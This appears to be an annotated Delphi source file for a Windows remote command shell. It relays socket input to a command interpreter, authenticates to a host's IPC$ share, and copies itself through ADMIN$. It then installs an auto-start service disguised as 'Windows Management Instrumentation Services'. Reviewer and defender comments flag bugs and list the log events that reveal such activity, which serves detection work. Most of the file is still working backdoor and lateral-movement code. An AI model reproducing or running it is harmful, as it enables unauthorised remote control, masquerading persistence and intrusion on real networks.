📄 t_cmd.pas
end;
// Thread body that relays data from the client socket to a pipe.
// Bytes are received one at a time, accumulated in szBuffer2Write, and the
// accumulated line is written to sdWrite.hPipe whenever a line feed (#10)
// arrives. The line 'exit' + CRLF closes the socket instead of being relayed.
//
// lpParam: pointer to a TSessionData record; it is copied by value on entry.
// Result:  always 0.
//
// NOTE(review): hPipe presumably feeds the standard input of a command
// interpreter started elsewhere in this unit; that code is not visible here.
// Everything read from the socket is untrusted, attacker-controllable input.
function WriteShell(lpParam: Pointer): Integer;
var
sdWrite: TSessionData;
dwBuffer2Write,
dwBufferWritten: DWORD;
szBuffer: array[0..0] of Char;
szBuffer2Write: array[0..BUFFER_SIZE - 1] of Char;
begin
sdWrite := TSessionData(lpParam^);
dwBuffer2Write := 0;
// The loop ends only when recv returns 0 (peer closed the connection).
// NOTE(review): SOCKET_ERROR (-1) is also non-zero, so a failed recv is not
// detected here and the previous byte in szBuffer would be processed again.
while recv(sdWrite.sClient, szBuffer, 1, 0) <> 0 do
begin
// NOTE(review): dwBuffer2Write is never checked against BUFFER_SIZE. A line
// longer than the buffer (no #10 seen) writes past the end of this stack
// array; the length is controlled by the remote peer.
szBuffer2Write[dwBuffer2Write] := szBuffer[0];
Inc(dwBuffer2Write);
// Case-insensitive match on the session-terminating command.
// NOTE(review): the buffer is never zero-terminated or cleared; resetting
// dwBuffer2Write below leaves bytes of earlier, longer lines in place, so
// this comparison may see stale data after the current line. Confirm how
// CompareText converts the char array before relying on it.
if CompareText(szBuffer2Write, 'exit' + CRLF) = 0 then
begin
// $02 is SD_BOTH: stop both sending and receiving before closing.
shutdown(sdWrite.sClient, $02);
closesocket(sdWrite.sClient);
Result := 0;
Exit;
end;
// A line feed completes the line: forward the dwBuffer2Write bytes collected
// so far to the pipe and start a new line.
if szBuffer[0] = #10 then
begin
if WriteFile(sdWrite.hPipe, szBuffer2Write, dwBuffer2Write,
dwBufferWritten, nil) = False then
begin
OutputDebugString('WriteFile in WriteShell(Recv) Error !'#10);
break;
end;
dwBuffer2Write := 0;
end;
// 10 ms pause after every received byte.
Sleep(10);
end;
// Reached on peer close or on a pipe write failure.
shutdown(sdWrite.sClient, $02);
closesocket(sdWrite.sClient);
Result := 0;
end;
// Opens or closes an authenticated connection to \\<hpHost>\ipc$.
//
// bConnect:   True to connect (WNetAddConnection2), False to disconnect
//             (WNetCancelConnection2).
// hpHost:     remote host name or address, inserted into the UNC path.
// lpUserName: account passed to WNetAddConnection2.
// lpPassword: password for that account; the literal string 'NULL'
//             (case-sensitive) is replaced by an empty password.
// Result:     True on success, False when the Win32 call reports a failure.
//
// Progress text is written to standard output.
//
// Defender note: an IPC$ session set up with explicit credentials, followed
// by ADMIN$ file writes and remote service creation (see InstallCmdService),
// is a remote-service-execution pattern worth alerting on; the logon and
// share access are recorded on the target when the corresponding audit
// policies are enabled.
function ConnectRemote(bConnect: Boolean;
hpHost, lpUserName, lpPassword: string): Boolean;
var
lpIPC: array[0..255] of Char;
dwErrorCode: DWORD;
NETRESOURCE: TNetResource;
begin
// NOTE(review): hpHost comes from the command line (see Main) and its length
// is not checked before being copied into the 256-character lpIPC buffer.
StrPCopy(lpIPC, Format('\\%s\ipc$', [hpHost]));
// No local device is mapped; only the remote name is used.
NetResource.lpLocalName := nil;
NetResource.lpRemoteName := lpIPC;
NetResource.dwType := RESOURCETYPE_ANY;
NetResource.lpProvider := nil;
if AnsiSameStr(lpPassword, 'NULL') then lpPassword := '';
if bConnect then
begin
Write('Now Connecting ...... ');
// Retry loop: if a connection to the resource already exists, it is
// cancelled and the connect is attempted again.
// NOTE(review): there is no retry limit; if the cancel keeps failing, this
// loop does not terminate.
while True do
begin
dwErrorCode := WNetAddConnection2(NetResource, PChar(lpPassword),
PChar(lpUserName), CONNECT_INTERACTIVE);
if (dwErrorCode = ERROR_ALREADY_ASSIGNED) or
(dwErrorCode = ERROR_DEVICE_ALREADY_REMEMBERED) then
WNetCancelConnection2(lpIPC, CONNECT_UPDATE_PROFILE, TRUE)
else if dwErrorCode = NO_ERROR then
begin
Write('Success !'#10);
break;
end
else
begin
Write('Failure !'#10);
Result := False;
Exit;
end;
Sleep(10);
end;
end
else // bConnect <> True
begin
Write('Now Disconnecting ... ');
// Last argument TRUE forces the disconnect even with open files or jobs.
dwErrorCode := WNetCancelConnection2(lpIPC, CONNECT_UPDATE_PROFILE, TRUE);
if dwErrorCode = NO_ERROR then
Write('Success !'#10)
else
begin
Write('Failure !'#10);
Result := False;
Exit;
end;
end;
Result := True;
end;
// Import declaration for the ANSI export ChangeServiceConfig2A in
// Advapi32.dll. It is declared here by hand; no call to it appears in the
// visible part of this unit.
function ChangeServiceConfig2(hService: SC_HANDLE;
dwInfoLevel: DWORD; lpInfo: Pointer): LongBool; stdcall;
external 'Advapi32.dll' name 'ChangeServiceConfig2A';
// Copies this executable to the target's system directory, registers it as an
// auto-start Win32 service named N_SERVICE_NAME, and starts it.
//
// lpHost: '' for the local machine; otherwise a remote host, in which case
//         the file is copied to \\<lpHost>\Admin$\system32\ and the remote
//         Service Control Manager is used.
//
// Progress text is written to standard output. No value is returned; every
// failure path prints a message and exits.
//
// Defender notes:
// - Service creation is logged on the target as System event 7045 (Service
//   Control Manager) and, with the relevant audit policy, Security event
//   4697; admin-share access as Security event 5140.
// - The display name used below resembles the built-in "Windows Management
//   Instrumentation" service. When triaging, compare the service's binary
//   path and file signature rather than trusting the display name.
// - SERVICE_AUTO_START makes the service persist across reboots.
procedure InstallCmdService(lpHost: string);
var
schSCManager: SC_HANDLE;
schService: SC_HANDLE;
lpCurrentPath: array[0..MAX_PATH] of Char;
lpImagePath: array[0..MAX_PATH] of Char;
lpHostName: string;
FileData: WIN32_FIND_DATA;
hSearch: THandle;
dwErrorCode: DWORD;
InstallServiceStatus: SERVICE_STATUS;
lpServiceArgVectors: PChar;
begin
// Work out the destination path of the service binary and the machine name
// to hand to OpenSCManager ('' means the local SCM).
if lpHost = '' then
begin
GetSystemDirectory(lpImagePath, MAX_PATH);
strcat(lpImagePath, '\' + N_SERVICE_BINARY_PATH_NAME);
lpHostName := '';
end
else
begin
// NOTE(review): lpHost originates from the command line (see Main); its
// length is not checked against the size of lpImagePath.
StrPCopy(lpImagePath, Format('\\%s\Admin$\system32\' +
N_SERVICE_BINARY_PATH_NAME, [lpHost]));
lpHostName := Format('\\%s', [lpHost]);
end;
Write('Transmitting File ... ');
// Copy the running executable to the destination only if no file with that
// name is already there; an existing file is left untouched.
hSearch := FindFirstFile(lpImagePath, FileData);
if hSearch = INVALID_HANDLE_VALUE then
begin
GetModuleFileName(0, lpCurrentPath, MAX_PATH);
if not CopyFile(lpCurrentPath, lpImagePath, FALSE) then
begin
dwErrorCode := GetLastError;
// 5 = ERROR_ACCESS_DENIED
if dwErrorCode = 5 then
Write('Failure ... Access is Denied !'#10)
else
Write('Failure !'#10);
Exit;
end
else
begin
Write('Success !'#10);
end;
end
else // found file
begin
Write('already Exists !'#10);
FindClose(hSearch);
end;
schSCManager := OpenSCManager(PChar(lpHostName), nil, SC_MANAGER_ALL_ACCESS);
if schSCManager = 0 then
begin
Write('Open Service Control Manager Database Failure !'#10);
Exit;
end;
Write('Creating Service .... ');
// NOTE(review): the binary path registered with the SCM is the constant
// N_SERVICE_BINARY_PATH_NAME, not lpImagePath; the constant's value is
// defined outside this view.
schService := CreateService(schSCManager, N_SERVICE_NAME,
'Windows Management Instrumentation Services', SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE, N_SERVICE_BINARY_PATH_NAME, nil, nil, nil, nil, nil);
if schService = 0 then
begin
dwErrorCode := GetLastError;
if dwErrorCode <> ERROR_SERVICE_EXISTS then
begin
Write('Failure !'#10);
CloseServiceHandle(schSCManager);
Exit;
end
else
begin
// The service is already registered: reopen it with start rights only.
Write('already Exists !'#10);
schService := OpenService(schSCManager, N_SERVICE_NAME, SERVICE_START);
if schService = 0 then
begin
Write('Opening Service .... Failure !'#10);
CloseServiceHandle(schSCManager);
Exit;
end;
end;
end
else
Write('Success !'#10);
Write('Starting Service .... ');
lpServiceArgVectors := nil;
if not StartService(schService, 0, lpServiceArgVectors) then
begin
dwErrorCode := GetLastError;
if dwErrorCode = ERROR_SERVICE_ALREADY_RUNNING then
begin
Write('already Running !'#10);
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
Exit;
end;
// Any other StartService error falls through to the status poll below
// without printing a message of its own.
end
else
Write('Pending ... ');
// Poll until the service leaves SERVICE_START_PENDING.
// NOTE(review): the loop has no timeout. If the first QueryServiceStatus call
// fails, InstallServiceStatus is read below without having been filled in; on
// the reopen path the handle was opened with SERVICE_START only.
while QueryServiceStatus(schService, InstallServiceStatus) do
begin
if InstallServiceStatus.dwCurrentState = SERVICE_START_PENDING then
Sleep(100)
else
Break;
end;
if InstallServiceStatus.dwCurrentState <> SERVICE_RUNNING then
Write('Failure !'#10)
else
Write('Success !'#10);
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
end;
// Stops and deletes the service N_SERVICE_NAME, then deletes its binary from
// the system directory.
//
// lpHost: '' for the local machine; otherwise a remote host, addressed through
//         \\<lpHost> for the SCM and \\<lpHost>\Admin$\system32\ for the file.
//
// Progress text is written to standard output. No value is returned.
//
// Defender note: because the service entry and the binary are both removed,
// evidence of an earlier install has to come from logs written at install
// time (service-installed events, share access, process creation) rather
// than from the service registry key or the file on disk.
procedure RemoveCmdService(lpHost: string);
var
schSCManager: SC_HANDLE;
schService: SC_HANDLE;
lpImagePath: array[0..MAX_PATH - 1] of Char;
lpHostName: string;
FileData: WIN32_FIND_DATA;
RemoveServiceStatus: SERVICE_STATUS;
hSearch: THandle;
dwErrorCode: DWORD;
begin
// Same path and host-name selection as in InstallCmdService.
if lpHost = '' then
begin
GetSystemDirectory(lpImagePath, MAX_PATH);
strcat(lpImagePath, '\' + N_SERVICE_BINARY_PATH_NAME);
lpHostName := '';
end
else
begin
// NOTE(review): lpHost originates from the command line (see Main); its
// length is not checked against the size of lpImagePath.
StrPCopy(lpImagePath, Format('\\%s\Admin$\system32\' +
N_SERVICE_BINARY_PATH_NAME, [lpHost]));
lpHostName := Format('\\%s', [lpHost]);
end;
schSCManager := OpenSCManager(PChar(lpHostName), nil, SC_MANAGER_ALL_ACCESS);
if schSCManager = 0 then
begin
Write('Opening SCM ......... ');
// NOTE(review): Write runs before GetLastError, so the error code read here
// may no longer be the one set by OpenSCManager.
dwErrorCode := GetLastError;
// 5 = ERROR_ACCESS_DENIED
if dwErrorCode <> 5 then
Write('Failure !'#10)
else
Write('Failure ... Access is Denied !'#10);
Exit;
end;
schService := OpenService(schSCManager, N_SERVICE_NAME, SERVICE_ALL_ACCESS);
if schService = 0 then
begin
Write('Opening Service ..... ');
dwErrorCode := GetLastError;
// 1060 = ERROR_SERVICE_DOES_NOT_EXIST
if dwErrorCode = 1060 then
Write('no Exists !'#10)
else
Write('Failure !'#10);
// NOTE(review): execution continues after this branch, so schSCManager is
// closed a second time below and CloseServiceHandle is called with a zero
// schService.
CloseServiceHandle(schSCManager);
end
else
begin
Write('Stopping Service .... ');
if QueryServiceStatus(schService, RemoveServiceStatus) then
begin
if RemoveServiceStatus.dwCurrentState = SERVICE_STOPPED then
Write('already Stopped !'#10)
else
begin
Write('Pending ... ');
if ControlService(schService, SERVICE_CONTROL_STOP,
RemoveServiceStatus) then
begin
// Wait for the stop to complete.
// NOTE(review): no timeout, and the result of QueryServiceStatus inside the
// loop is ignored.
while RemoveServiceStatus.dwCurrentState = SERVICE_STOP_PENDING do
begin
Sleep(10);
QueryServiceStatus(schService, RemoveServiceStatus);
end;
if RemoveServiceStatus.dwCurrentState = SERVICE_STOPPED then
Write('Success !'#10)
else
Write('Failure !'#10);
end
else
Write('Failure !'#10);
end;
end
else
Write('Query Failure !'#10);
// The service is deleted regardless of whether the stop succeeded.
Write('Removing Service .... ');
if not DeleteService(schService) then
Write('Failure !'#10)
else
Write('Success !'#10);
end;
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
Write('Removing File ....... ');
// Fixed 1.5 s delay before the binary is deleted; presumably gives the
// stopped service process time to exit and release the file.
Sleep(1500);
hSearch := FindFirstFile(lpImagePath, FileData);
if (hSearch = INVALID_HANDLE_VALUE) then
Write('no Exists !'#10)
else
begin
if not DeleteFile(lpImagePath) then
Write('Failure !'#10)
else
Write('Success !'#10);
FindClose(hSearch);
end;
end;
// Prints the banner text held in N_START_MESSAGE to standard output.
procedure Start;
begin
  Write(N_START_MESSAGE);
end;
// Prints the command-line help text held in N_USAGE_MESSAGE to standard output.
procedure Usage;
begin
  Write(N_USAGE_MESSAGE);
end;
// Program entry logic. Behaviour depends on the number of command-line
// arguments:
//   4 arguments: <-install|-remove> <host> <user> <password>
//                connect to the host's IPC$ share, install or remove the
//                service there, then disconnect.
//   1 argument:  -install or -remove acts on the local machine; anything
//                else prints the banner and usage text.
//   otherwise:   the process hands control to the service control dispatcher
//                with CmdStart as the service main (defined outside this view).
//
// Defender note: in the 4-argument form the user name and password are plain
// command-line arguments, so they appear in process-creation logs that record
// command lines (for example Security event 4688 with command-line auditing
// enabled).
procedure Main;
var
DispatchTable: array [0..1] of SERVICE_TABLE_ENTRY;
begin
// Single-service dispatch table, terminated by a nil entry.
DispatchTable[0].lpServiceName := N_SERVICE_NAME;
DispatchTable[0].lpServiceProc := @CmdStart;
DispatchTable[1].lpServiceName := nil;
DispatchTable[1].lpServiceProc := nil;
if ParamCount = 4 then
begin
if not ConnectRemote(TRUE, ParamStr(2), ParamStr(3), ParamStr(4)) then
begin
ExitCode := -1;
Exit;
end;
// NOTE(review): if ParamStr(1) is neither -install nor -remove, the
// connection is still opened and closed but nothing else is done and no
// usage text is shown.
if SameText(ParamStr(1), '-install') then InstallCmdService(ParamStr(2))
else if SameText(ParamStr(1), '-remove') then RemoveCmdService(ParamStr(2));
if not ConnectRemote(FALSE, ParamStr(2), ParamStr(3), ParamStr(4)) then
begin
ExitCode := -1;
Exit;
end;
Exit;
end
else if ParamCount = 1 then
begin
if SameText(ParamStr(1), '-install') then InstallCmdService('')
else if SameText(ParamStr(1), '-remove') then RemoveCmdService('')
else
begin
Start;
Usage;
end;
Exit;
end;
// Any other argument count: run as a service. The return value of
// StartServiceCtrlDispatcher is not checked.
StartServiceCtrlDispatcher(DispatchTable[0]);
end;
end.